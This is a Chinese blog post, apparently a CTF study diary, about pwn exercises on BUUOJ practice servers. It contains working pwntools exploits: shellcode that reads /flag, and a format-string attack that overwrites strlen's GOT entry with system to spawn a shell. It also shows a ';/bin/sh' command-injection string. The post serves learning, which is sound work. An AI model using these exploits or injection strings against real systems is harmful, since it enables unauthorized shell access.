pwn学习(3)

最新推荐文章于 2024-05-11 09:52:27 发布
最新推荐文章于 2024-05-11 09:52:27 发布
阅读量185 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37439229/article/details/108906831
版权

今天复现了一个gactf的wannaflag,od断到text直接就可以看加密,比较简单
在pwn方面,今天依旧在刷题,没学习什么知识
,(真是懒狗),不过做题过程碰到几个点,没有遇到过,提一下,
system(‘ping ;/bin/sh’)
system原来可以接连两三个指令
seccomp
可以用来限制系统调用,orz向我展示了pwntool的功能
orz

from pwn import *

p = remote('node3.buuoj.cn',25572)
shellcode = shellcraft.open('/flag')
shellcode += shellcraft.read('eax','esp',50)
shellcode += shellcraft.write(1,'esp',50)
shellcode = asm(shellcode)
p.send(shellcode)

p.interactive()

格式化字符串
fmt32,
可以泄露地址,确认libc,然后覆盖got表,
也是通过格式化字符串,只不过我偏移还不是算的特别熟练,需要加强,格式化字符串的功能还没有熟练掌握,说白了,还是不够熟练

from pwn import *
p = remote('node3.buuoj.cn',25269)
elf = ELF('./main')
libc = ELF('./libc6-i386_2.23-0ubuntu10_amd64.so')
strl_addr = elf.got['printf']
payload1 = 'a' + p32(strl_addr) + '22%8$s'
p.sendafter('tell me:',payload1)
p.recvuntil('22')
leak = u32(p.recv(4))
print(hex(leak))
libcbase = leak -libc.sym['printf']
sym_addr = libcbase + libc.sym['system']
high_addr = (sym_addr>>16)&0xffff
low_addr = sym_addr&0xffff
strlen_got = elf.got['strlen']
payload2 = 'a' + p32(strlen_got) + p32(strlen_got+2) + "%"+str(low_addr-18)+'c'+'%8$hn' + "%" + str(high_addr-low_addr)+'c'+'%9$hn'
p.sendafter('tell me:',payload2)
p.sendafter('tell me:',';/bin/sh\x00')
p.interactive()

明天任务,看完brop,有时间尽量刷题,复现re,毕竟位明天还想出去玩玩。。。

20000s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
pwn学习(一)
weixin_33701617的博客
08-12 1233
实战前的准备 pwn在ctf中算是一个门槛较高的分支,而且这方面的资料也相对较少,所以学习pwn的人也是相对较少的。我本人呢,是一个菜鸟,本科不是计算机系的,学习这个完全是出于兴趣。写这些东西,一来是记录自己的学习状况,二来呢,就是希望给正准备踏上pwn这条路的朋友们,提供一点思路。 废话不多说,开始进入正题: 1. 学习pwn所需要的...
2024年最新CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1),学习路线+知识点梳理
最新发布
2401_84264244的博客
05-11 463
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Pwn学习
红叶的博客
10-25 1124
需要输入的字符数量为112,由于没有system,因此需要使用ROPgadget工具。其中vuln函数与replace函数配合使用,输入的I被replace函数替换为you。这题没什么好说的,打开就是shell函数,使用nc直接连接就可以拿到shell。输入I又被替换为you,因此60/3 = 20,输入20个I即可溢出。栈溢出漏洞,buf2为全局变量,并且是bss段,具有可执行权限。shell的地址为IDA下get_shell函数的地址 即。fun函数为shell函数,main函数中存在栈溢出漏洞。
Pwn 学习
qq_41672971的博客
09-26 1319
windows pwn
pwn学习
weixin_40597510的博客
01-24 1112
转自https://r00tk1ts.github.io/2017/09/11/PWN%E9%80%89%E6%89%8B%E7%9A%84%E8%87%AA%E6%88%91%E4%BF%AE%E5%85%BB/#%E6%A0%88%E6%BA%A2%E5%87%BA%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95 栈 特性:先进先出 内存的一片区间,栈型结构管理,...
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
PWN学习
ca1m4n的博客
02-05 1426
PWN学习写在前面的话0x01 Hello,PWN!0x02 写在前面的话 如题,胖手的回归我愿称之为重操旧业。pwn学习难度比较大,牵涉范围又广,我也不知道为啥选了这个方向????。前两天写个最简单的溢出没写出来,想想趁这个寒假重新学起,笔记po这里日常更新????仅供参考,不是系统学习,以打比赛为目的,途径主要是到处找的小视频、大佬们的博客和题目。希望看到的铁汁们不吝赐教! 0x01 Hello,PWN! "Pwn"是一个黑客语法的俚语词,是指攻破设备或者系统 。 CTF中的pwn是指通过程序本身
pwn学习(1)
weixin_33979745的博客
04-25 343
0x00 简介 入职之后,公司发布任务主搞pwn和re方向,re之前还有一定的了解,pwn我可真是个弟弟,百度了一番找到了蒸米大佬的帖子,现在开始学习。 0x01 保护方式 NX (DEP):堆栈不可执行 ASLR:内存地址随机化,在linux和pie相结合,aslr是系统是否开启,有0.1.2三个等级,而pie是程序自身是否开启,两者共同作用有不同的效果,如下图。 Canary(GS):...
PWN-学习笔记
小龙在线
08-23 715
原理 危险函数:gets scanf pwndbg Python2 安装 pip install pwntools apt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com
pwn学习--collision
Casuall的博客
03-21 661
pwn-test-collision 本题来自https://pwnable.kr,是第二道题——collision。   首先通过ssh连过去,有三个文件,y一个可执行文件,一个C源文件,一个没有读权限的flag文件。尝试运行这个可执行文件,直接运行该程序,提示后面需要添加参数passcode,随便输入几个字符运行,得到提示需要输入20个字符,再输入20个字符,提示passcode错误。如图所示...
pwn学习-中级ROP-BROP
WocW的博客
03-06 870
实例复现 先与程序交互 这里直接用本地服务器模拟远程的,但实际上不对原文件进行逆向分析。 其中asdasd为我任意输入的password,可以看出程序的基本交互。这里我们开始 爆破出buffer的长度 exp from pwn import * from LibcSearcher import LibcSearcher def getBufferLength(): i...
Pwn学习流程
cm_zl
04-23 453
Pwn前置技能: 汇编语言 C语言 python linux系统 Pwn环境搭建: ubantu(64位) python2 pip pwntools pwndbg 32位libc库 ……
PWN学习资料整理——(二)基础
recover517的博客
08-22 920
PWN中,永远离不开汇编,包括汇编指令,寄存器等,本文对计算机基础做简单介绍。
PWN入门系列教程~(1)
小心信科理化声
11-30 7313
PWN入门系列教程~(1)前言关于我的故事先来说下学习路线大致分为以下几个部分那么什么是PWN呢?栈函数调用栈寄存器函数调用栈的经典内存布局 前言 关于我的故事 博主是一名20级在校大学生,平常热爱网络安全。喜欢打CTF,但是自己所在的学校里并没有人去担任PWN的工作,身为会长的我自来要挑起重担了,在跟几位有联系的PWN佬交流后明确了自己的要学pwn。 先来说下学习路线 大致分为以下几个部分 学习基础:去学习一些基本的原理 学习真实漏洞 编写exp FUZZ 那么什么是PWN呢? 来说下pwn的来源:
CTF-PWN学习-为缺少指导的同学而生_ctf pwn,2024年我们程序员该如何进阶和规划
m0_60635637的博客
04-05 949
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
英飞凌TC264学习PWN
10-18
好的,关于英飞凌TC264学习PWN,我可以给你一些指导。...3. 学习常见的漏洞挖掘技术,如栈溢出、堆溢出、格式化字符串漏洞等; 4. 实践PWN攻击,可以使用一些CTF平台上的题目进行练习。 希望这些指导对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值